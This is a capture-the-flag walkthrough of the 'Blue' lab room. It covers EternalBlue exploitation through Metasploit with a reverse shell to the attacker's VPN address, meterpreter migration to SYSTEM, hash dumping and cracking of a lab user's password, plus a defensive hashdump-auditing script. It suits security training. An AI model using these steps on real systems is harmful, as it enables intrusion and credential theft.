Blue

Intro
Room Info
🔗 Name
🎯 Target IP: 10.10.177.175
📈 Difficulty level: 🟢 Easy
💲 Subscription type: Free
🪟 OS: Windows
Recon
nmap -p1-1000 10.10.177.175
nmap -sV -p445 10.10.177.175
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175
Exploitation
msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run
background # or CTRL+Z

Privilege Escalation
The payload used was windows/x64/shell/reverse_tcp, so convert the plain command shell to a meterpreter shell.
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 2
run

sessions 5
getuid
Server username: NT AUTHORITY\SYSTEM
ps
My process may not run as the SYSTEM user. Select a PID (process ID) of a process running as NT AUTHORITY\SYSTEM and migrate my process to that one, e.g.
1284 - spoolsv.exe
migrate 1284

Post Exploitation
Cracking
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
aad3b435b51404eeaad3b435b51404ee is the LM hash for no password.
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
ffb43f0de35be4d9917ac0cc8ad57f8d is the NTLM hash for alqfna22.
Jon's credentials are jon:alqfna22.
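As an added example (not part of the original write-up), the following parses hashdump output in the <Username>:<User ID>:<LM hash>:<NT hash>::: format shown above and flags the two well-known "no password" hashes: the LM value the write-up explains and the NT hash of the empty string (MD4 of an empty UTF-16LE string). The three sample lines are the ones dumped in this room; a blank NT hash means an empty password, so those accounts are the first thing an auditor should check (the account may still be disabled).

```python
# Added example, not code from the original write-up: audit pwdump/hashdump lines.

# LM hash stored when no LM hash exists (LM hashing disabled or blank password).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: MD4("" encoded as UTF-16LE).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The three lines dumped in this room (copied from the write-up above).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


def parse_hashdump(text):
    """Parse <user>:<rid>:<LM>:<NT>::: lines into dicts; blank or malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue  # not a 16-byte hex digest; ignore the line
        records.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            "lm_stored": lm != EMPTY_LM,     # a real LM hash is present (weak, should not exist)
            "blank_password": nt == EMPTY_NT,
            "builtin": rid < 1000,           # RID 500/501 are the built-in Administrator/Guest
        })
    return records


def audit(records):
    """Return the account names an auditor should look at first, by finding."""
    return {
        "blank_password": [r["user"] for r in records if r["blank_password"]],
        "lm_stored": [r["user"] for r in records if r["lm_stored"]],
    }


if __name__ == "__main__":
    for finding, users in audit(parse_hashdump(SAMPLE_DUMP)).items():
        print(f"{finding}: {users}")
```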

Flags
🚩 In the meterpreter session
cd C:\\
dir
cat flag1.txt
flag{*******************

cd C:/Windows/System32/config
cat flag2.txt
flag{*****************************

cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt
flag{********************************
